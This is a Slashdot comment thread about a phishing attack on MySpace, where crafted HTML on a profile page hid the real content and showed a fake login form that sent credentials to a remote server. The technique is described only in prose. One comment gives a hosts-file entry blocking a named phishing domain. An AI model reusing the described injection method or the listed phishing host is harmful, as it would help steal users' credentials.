MySpace Accounts Compromised By Phishers 86
An anonymous reader writes, "Netcraft has discovered that the social networking site MySpace appears to have been compromised by phishers who have presented a spoof login form on the main site. This modified login form submits the victim's username and password to a remote server hosted in France." From the article: "The hackers have engineered a fake login form on MySpace's own web site. Netcraft has notified MySpace of the issue, although it currently remains live. Because the fraudulent login page is hosted on MySpace's own servers and does not exhibit any signs of external content, such as cross-site scripting or open redirects, it is convincing and even security-conscious users are at risk of becoming victims. The attack is launched from a profile page, where the username is login_home_index_html, and uses specially-crafted HTML in order to hide the genuine MySpace content from the page and instead display its own login form." This Washington Post story from a few months back explains what's in it for the phishers.
Maybe I caused the slow discovery (Score:3, Interesting)
I've been seeing 'em now and then and contacting the hosts where the scripts are hosted to get their accounts disabled.
I'm not worried about being phished myself... I'm quite perceptive...but it's people I know who I'm worried about.
Re: (Score:2, Funny)
Re: (Score:2, Funny)
Re: (Score:1, Funny)
Re: (Score:2, Informative)
They need to get that fixed ASAP (Score:1, Troll)
Re: (Score:1)
Re: (Score:1)
Finally (Score:3, Funny)
The secrets of apathetic teens will soon be aired for the world to view!
Not quite. (Score:1, Informative)
http://www.comscore.com/press/release.asp?press=10 19 [comscore.com]
Re:Not quite. (Score:4, Funny)
Re: (Score:1)
Re: (Score:1)
You're thinking of Livejournal.. (Score:2)
Re: (Score:1)
1 a real like paid domain ------- got that myself
2 a real like paid hosting agreement ----- i use imagelinkusa.net myself
3 some actual html skills (or some sanish tools)
if you want to use some crawling horror like Myspace setup some sort of Zen profile and LINK YOUR DOMAIN
(funny thing is mySpace is blocked by at least one company)
Re: (Score:2)
Just curious...
You can view the horrible phishing status for free (Score:4, Interesting)
BTW as it is free to use, SURBL added it, now the stuff which you verify actually helps to people using that free list.
Netcraft confirms (Score:2, Funny)
Re: (Score:1)
So Much for IE7's Anti-Phishing (Score:2)
Meanwhile "web 2.0" applications will suffer phishing attacks anyway because the 2.0 complexity offers so many new ways to do bad things.
Today myspace, tomorrow your web 2.0 bank? Google 2.0 application?
I'm not saying progress is bad. But there's no penalty/liability for writing insecure web 2.0 apps.
Re: (Score:1)
Re: (Score:2)
Re: (Score:2)
> view it's a nightmare. Malformed HTML, non-degradable Javascript, code
> injection issues...
In other words, Web 2.0.
It's dead... (Score:1)
Seems Myspace has fixed it. Not that I really care, as I've never used it nor do I have any intention to.
Next!?
Re: (Score:1, Insightful)
No, they've deleted this one specific account - the vulnerability that allowed the phishers to insert a form (and the styling to remove the regular page content (which is a feature)) is almost certainly still there.
Expect to see a large number of variations on this to show up in the next few days/weeks.
NOT on Myspace's MAIN PAGE (Score:5, Informative)
The attack is launched from a profile page, where the username is login_home_index_html, and uses specially-crafted HTML in order to hide the genuine MySpace content from the page and instead display its own login form.
Netcraft says this is still live on Myspace's main page. I've looked at the HTML source for both the main page, and that special login page you get when you try to access a portion of the site that requires you to log in. On both pages, I located the form element which controls the login. The method is POST, and the action redirects to a script under the "login.myspace.com" domain.
So the summary and the article itself is slightly misleading (at first) by implying (perhaps unintentionally) that the phishing attempt is coming directly from Myspace's main page.
Re: (Score:2, Informative)
Re: (Score:2)
I also noticed that the summary doesn't make any mention of it being a profile page. The article itself doesn't tell you it's a profile page until much further down. Seems like this would be the first thing to point out.
Based on the summary, I got the impression that you would be presented with the false login form if you went to http://www.myspace.com/ [myspace.com]
Re: (Score:1)
So while still a serious problem, it won't affect near as many people.
Re: (Score:2)
Security conscious people use MySpace? Who knew...
There's even a Slashdot group [myspace.com] on it actually. And as security concious as I am, I didn't see what was wrong with the two first example screenshots on Tom's blog about phishing [myspace.com], I think that if I went through one of these fake login-page profiles I might have fell for it, just because I don't expect to get phishing from a page on the genuine site itselves. Lots of people in my MySpace friends fell for it, and almost half of the bulletins in my bulletins lis
Re: (Score:2)
I suppose they could avoid this problem in the future by stripping FORM tags from the editable parts of users profiles. That would keep this from happening again, but might break some really custom (not even recognisable) myspace pages.
Number of compromised accounts (Score:2)
1) the total number of "phished" accounts
2) the number of "phished" accounts in terms of a percentage of the total userbase.
Re: (Score:1)
Re: (Score:2)
Re: (Score:1)
Re: (Score:2)
Re: (Score:1)
MySpace Age Ranges By Gender As Indicated By Users
Age Range % Male % Female % Total
12 to 15 0.0007 0.0012 0.0019
16 to 18 9.25 12.39 21.64
19 to 21 11.64 12.29 23.93
22 to 35 22.90 18.00 40.90
36 to 55
Re: (Score:1)
someone should tell the phishers (Score:1)
Re: (Score:2)
The 16 years old kid who logs onto MySpace at 02:41 is using the same computer in the basement that mom and dad use the next mornign at 07:45 to log into their bank accounts, pay bills, trade some stock, and so on.
That's why even a free MySpace is a good target. As a matter of fact, MySpace is an excellent target because it has highly loyal and extremely active users who log into MySpace multiple times a day. This means that if the phishers' crack stays
Re: (Score:2)
Yes, the phishers could create MySpace accounts/pages from scratch, but their work pays off much more quickly if they co-opt the pages of frequent users with large, we
Re: (Score:2)
Huh ? Right ?
Guys ?
Re: (Score:1)
Re: (Score:2)
People login to myspace with an email address and password.
If a person used the same password for their email, then not only is their email comprimised, but via their email, the attacker gets a list of other potential sites to try.
I would be extra suspicious of strange behaviour by ebay users for example. What is especially insidious about this is that once you've got someone's email account, you can run
Re: (Score:2)
MySpace is free.. I can understand phishing for credit card numbers or bank logins, But MySpace?
There's actually a great interest in it. Because when you're an average user, unaware of that whole phishing thing, and that bulletins one of your favourite singers or friends say "~New Ring tones Adults can't hear! Download Today*", linking to a website to supposedly download them, you're much more likely to click, thinking it was advised to you by someone real (a "friend" or an artist you like), than when you
Re: (Score:2)
This one got me... (Score:1)
Re: (Score:1)
True story... and I posted it on a forum wher you don't want to click any links.
(Captcha: mourning... I am, indeed, for today's security.)
Using the same username/password everywhere (Score:1)
Phishing + SSL (Score:1)
How do sites like these get SSL from Verisign? How could that slip though? There was a recent
Re: (Score:3, Insightful)
When you can buy SSL certificates so damn cheap, $15 or less at some places, no serious company is going to certify you as being hardened against XSS or traditional hacks like this and compensate you or your users when you DO get hacked.
Besides, Verisig
Re: (Score:3, Interesting)
Registrant:
Washington Mutual, Inc. (DOM-1398425)
1201 3rd Ave Seattle WA 98101 US
Domain Name: wamucards.com
Registrar Name: Markmonitor.com
Registrar Whois: whois.markmonitor.com
Registrar Homepage: http://www.markmonitor.com/ [markmonitor.com]
Administrative Contact:
First off... (Score:1)
This wouldn't have happened (Score:1, Redundant)
nothing new... (Score:1)
My girlfriends account was compromised like this about a month ago. She tried telling me the Mac has a virus (really). I made her change her password and now I periodically do a "Reset Safari" on 'her' browser.
I haven't noticed any strange posts by her or anything since the initial attack, so it seems it's a one time only type deal. Of course, a attack like this could be potentially worse, hell I wish it was worse. I wish it would have ruined her account and wouldn't let her create a new one.
The des
Re: (Score:1)
Taken Down? (Score:2)
Either that, or, that's what these scammers want us to think?
the YTMND irc channel is full of myspace phishers (Score:1)
How is MySpace leaving the hack up legal? (Score:1)
How long was it active? (Score:2)
When we first came across this information a few days ago, it was also linked to Mashable.com [mashable.com], which claims that up to 3,000 logins may have been compromised, and that they only recently became more successful in running the attack (having initially screwed up the inserted script). The other aspect is that Mashable appears to be talking about a slightly different phishing attack, which is still functional (using MySpace bulletins to spam other users).
Filtering based on blacklists (as you are suggesting M
But Why (Score:2)
1. It is a good way to get information about the user
2. Good way to get information about the user's friends.
3. How many pc illiterate often use same password for multiple accounts?
I have already added the following line to my hosts files:
216.178.32.51 greentea420.iespanna.es
So ... why is this a bad thing? (Score:2, Funny)
War is fun when you hate both sides.
Re: (Score:2)
idiots fall for otherwise transparent con (Score:1)
I'm not surprised (Score:1)
Also the MySpace site is general is kinda clunky.. Looks like some high school kids project thats still learning HTML. Another words it look like crap. I